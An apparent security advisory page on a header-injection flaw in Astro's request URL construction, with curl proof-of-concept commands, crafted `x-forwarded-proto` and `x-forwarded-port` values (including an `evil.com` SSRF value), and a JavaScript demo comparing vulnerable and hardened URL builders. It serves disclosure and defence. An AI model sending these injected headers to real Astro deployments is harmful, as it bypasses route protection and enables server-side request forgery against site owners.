In affected versions of Astro using on-demand rendering, the `createRequest` function insecurely uses the `x-forwarded-proto` and `x-forwarded-port` headers to construct the request URL without sanitization. The header values are interpolated directly into the URL string: new URL(`${protocol}://${hostnamePort}${req.url}`). By injecting a malicious value into the `x-forwarded-proto` header (e.g. `x:admin?`), an attacker controls the scheme segment of that string. The URL parser interprets `x:` as the scheme and `admin` as the pathname, with the rest of the string (including the original host and path) landing in the query; because the resulting pathname no longer starts with a slash, slash-based path checks in middleware are bypassed. This allows for route protection bypass. Similarly, injecting a value like `https://evil.com?` into the same header creates a URL whose host is `evil.com` and whose original path becomes part of the query string, enabling SSRF if this URL is used for server-side fetches.
Platform: Astro
Version: <=2.16.0
Vulnerability: Header Injection
Severity: Critical
date: 2025
Prediction: 2025-01-15
What Undercode Say:
# Route-protection bypass: the parsed pathname becomes "admin" (no leading slash)
curl -i -H "x-forwarded-proto: x:admin?" http://localhost:4321/admin

// Example vulnerable URL construction in Astro (simplified)
const protocol = req.headers['x-forwarded-proto'] || 'http';
const hostnamePort = getHostnamePort(req); // joins the hostname with x-forwarded-port, also unsanitized
const url = new URL(`${protocol}://${hostnamePort}${req.url}`);

# SSRF / path rewrite: the parsed URL becomes https://localhost/vulnerable with the original path in the query string
curl -i -H "x-forwarded-proto: https://localhost/vulnerable?" http://localhost:4321/ssr
How to Exploit:
Bypass middleware protection.
Cache poisoning via CDN.
Server-Side Request Forgery.
WAF bypass.
Protection from this CVE
Update Astro version.
Sanitize forwarded headers.
Validate request host/protocol.
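The following is an added example, not Astro's own code: a minimal re-creation of the header-to-URL flow described above, placed beside a hardened version that applies the protections listed (validate the forwarded protocol and port, then check the resulting host and path). It also goes slightly beyond the page's examples by showing an `x-forwarded-port` injection. The request object, the `makeRequest` helper, the hostname `localhost` and the port 4321 are assumptions made for the demonstration; the parsing results come straight from the WHATWG `URL` class that Node.js provides.

```javascript
// Added example (not Astro's code). Re-creates the pattern from the advisory:
//   new URL(`${protocol}://${hostnamePort}${req.url}`)
// with attacker-controlled x-forwarded-proto / x-forwarded-port, and a hardened variant.

// Constructed sample request: the shape a Node HTTP server sees behind a proxy.
// (Assumed: `headers` holds lowercase header names, `url` is the path the client sent.)
function makeRequest(headers, url) {
  return { headers, url, socket: { localPort: 4321 } };
}

// Vulnerable: trusts x-forwarded-proto and x-forwarded-port verbatim.
function buildUrlVulnerable(req, hostname = 'localhost') {
  const protocol = req.headers['x-forwarded-proto'] || 'http';
  const port = req.headers['x-forwarded-port'] || req.socket.localPort;
  return new URL(`${protocol}://${hostname}:${port}${req.url}`);
}

// Hardened: only accept values a proxy could legitimately send, then re-check the result.
const ALLOWED_PROTO = new Set(['http', 'https']);
function buildUrlHardened(req, hostname = 'localhost') {
  const rawProto = req.headers['x-forwarded-proto'];
  const protocol = ALLOWED_PROTO.has(rawProto) ? rawProto : 'http';
  const rawPort = req.headers['x-forwarded-port'];
  const portOk = /^\d{1,5}$/.test(rawPort) && Number(rawPort) <= 65535;
  const port = portOk ? rawPort : String(req.socket.localPort);
  const url = new URL(`${protocol}://${hostname}:${port}${req.url}`);
  // Defence in depth: the path must still be slash-rooted and the host must be ours.
  if (!url.pathname.startsWith('/') || url.hostname !== hostname) {
    throw new Error('refusing to build URL from untrusted forwarded headers');
  }
  return url;
}

// A naive middleware guard of the kind the advisory says gets bypassed.
function isProtectedPath(url) {
  return url.pathname.startsWith('/admin');
}

// Runs the three injection cases through both builders and reports what the parser saw.
function demo() {
  const cases = {
    // x:admin?://localhost:4321/admin -> scheme "x:", opaque path "admin", rest in query
    pathBypass: makeRequest({ 'x-forwarded-proto': 'x:admin?' }, '/admin'),
    // https://evil.com?://localhost:4321/admin -> host evil.com, original path in query
    ssrf: makeRequest({ 'x-forwarded-proto': 'https://evil.com?' }, '/admin'),
    // http://localhost:4321/evil?/admin -> path rewritten to /evil via the port header
    portInjection: makeRequest({ 'x-forwarded-port': '4321/evil?' }, '/admin'),
  };
  const out = {};
  for (const [name, req] of Object.entries(cases)) {
    const bad = buildUrlVulnerable(req);
    const good = buildUrlHardened(req);
    out[name] = {
      vulnerable: { href: bad.href, pathname: bad.pathname, hostname: bad.hostname, protected: isProtectedPath(bad) },
      hardened: { href: good.href, pathname: good.pathname, hostname: good.hostname, protected: isProtectedPath(good) },
    };
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

In the first case the vulnerable builder yields a pathname of `admin` with no leading slash, so `isProtectedPath` returns false for a request to `/admin`; in the second, `hostname` is `evil.com`. The hardened builder falls back to `http` and the socket port for every case, producing `http://localhost:4321/admin`, which the guard correctly flags as protected. Rejecting unexpected values (rather than trying to clean them) is the safer choice here, since the only legitimate senders of these headers are your own reverse proxies.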
Impact:
Admin route bypass.
Application Denial-of-Service.
Internal service access.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

